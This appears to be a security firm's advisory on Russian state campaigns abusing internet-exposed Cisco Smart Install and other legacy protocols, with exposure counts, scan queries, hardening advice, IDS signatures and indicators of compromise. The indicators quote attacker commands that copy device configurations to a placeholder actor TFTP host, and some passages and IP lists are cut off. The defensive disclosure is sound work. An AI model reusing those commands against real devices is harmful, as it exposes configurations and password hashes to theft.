Russian state actors have carried out attacks on Western targets for years. The British NCSC and US DHS have now specifically called out Russia in a warning about a wave of attacks going back to at least 2016. With these attacks, Russian state actors have attempted to compromise network devices on a large scale. The sectors primarily targeted by these attacks are government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors.
Through legacy protocols and outdated software of network devices, the attackers try to fingerprint vulnerable devices and leverage vulnerabilities to gain access.
The attackers search for network devices (Firewalls, switches and routers) with outdated, insecure or unauthenticated protocols, that are accessible from the internet. They then leverage the accessible protocols to get access to the device followed possibly by a foothold in the connected network.
Some examples of protocols/services that were leveraged to gain access are:
- Telnet (port 23)
- HTTP (port 80)
- SNMP (port 161/162)
- Cisco Smart Install (port 4876)
Cisco Smart Install protocol (SMI) is of particular interest since it can be abused to retrieve the configuration of certain Cisco network devices, this is normally only possible when an attacker is inside the network. Whenever a SMI supported network device is externally reachable, an attacker could send a spoofed SNMP packet to trick the device in sending its configuration.
Such configuration contains information related towards the machine and its connected network, including password hashes. Based on the configuration it is possible to map the network infrastructure and possible interesting targets. The gathered information and password hashes will be used to gain remote access to servers.
Because SMI is an unauthenticated protocol, an attacker is able to configure/edit any SMI supported network devices and deploy a backdoored version of the used operating system. With the right changes an attacker is able to perform a Man-In-The-Middle attack and steal data.
Based on the Shodan results from today, about 150.000 SMI supported devices are externally reachable.
Top five countries with the highest amount of externally reachable SMI supported devices:
- United States (42,167)
- Russian Federation (10,984)
- Japan (9,064)
- China (8,796)
- Republic of Korea (7,467)
Am I vulnerable?
You will be vulnerable to attacks using this MO if your organization has devices connected to the internet with unauthenticated or otherwise open and reachable ports. In other words, this is an issue that everyone should be aware of. Even if state actors are not a relevant threat to your organisation, there are other actors that use this same MO.
To find out specifically if you have an externally reachable Cisco Smart Install supported device in your network, you can use the following Shodan search query:
Cisco Smart Install Client active ip:"<IP>" Cisco Smart Install Client active net:"<SUBNET>"
Where IP is your external IP address (not an RFC 1918 IP) used, if you have more than one IPs you need to split them with a comma.
Cisco Smart Install Client active ip:"126.96.36.199, 188.8.131.52" Cisco Smart Install Client active net:"184.108.40.206/24"
Or you can use NMAP (Network Mapper) with the follow parameters:
nmap -p 4786 -v <IP>
If the response banner contains “Cisco Smart Install Client active” the network
Fox-IT advises the following:
- For any network connected device, especially those connected to the internet directly, make sure that you understand which ports are open, and who needs access to those. Reduce your attack surface either by closing ports or restricting access through use of (multi-factor) authentication and/or other methods of access control, such as access control lists.
- Do not allow the usage of unencrypted connections for external network management changes. A secure alternative is the usage of SSH, HTTPS/TLS or encrypted VPN connections for network management changes.
- Limit or disable the usage of the outdated and unsecure protocols like Telnet SNMPv1 & SNMPv2
- Apply a strong password policy, with unique password for every device.
Fox-IT has created the following additional signatures to detect the usage of the Smart Install Exploit Tool. These signatures are used to detect the scanning activity of the used tool.
alert tcp $EXTERNAL_NET any -> $HOME_NET 4786 (msg:"FOX-SRT - IOC - SmartInstallExploitationTool GetConfig Command"; content:"copy system:running-config"; fast_pattern; content:"config.text tftp://"; classtype:attempted-admin; reference:<blog>; priority:1; sid:1; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET 4786 (msg:"FOX-SRT - IOC - SmartInstallExploitationTool Execute Command"; content:"execute.txt"; fast_pattern; content:"tftp://"; classtype:attempted-admin; reference:<blog-url>; priority:1; sid:1; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET 4786 (msg:"FOX-SRT - IOC - SmartInstallExploitationTool Upload Config Command"; content:".conf" fast_pattern; content:"tftp://"; classtype:attempted-admin; reference:<blog-url>; priority:1; sid:1; rev:1;)
The US-CERT and NCSC UK has also published some signatures based on the usage of the Smart Install Exploitation Tool.
alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_UpdateIos_And_Execute"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 02 00 00 01 c4|"; offset:0; depth:16; fast_pattern; content:"://";) alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_ChangeConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 03 00 00 01 28|"; offset:0; depth:16; fast_pattern; content:"://";) alert tcp any any -> any 4786 (msg: "SmartInstallExploitationTool_GetConfig"; flow: established; content:"|00 00 00 01 00 00 00 01 00 00 00 08 00 00 04 08|"; offset:0; depth:16; fast_pattern; content:"copy|20|";)
Indicator of Compromise
The initial scanning activities from June and July on the SMI port has been performed from the following IP-addresses:
These IPs started sending the following commands to copy the configuration files:
copy nvram:startup-config flash:/config.text copy nvram:startup-config tftp://[actor address]/[actor filename].conf
What the filename of the configuration file is, is currently unknown. Currently only a single IPs address is known being used to retrieve the configuration to: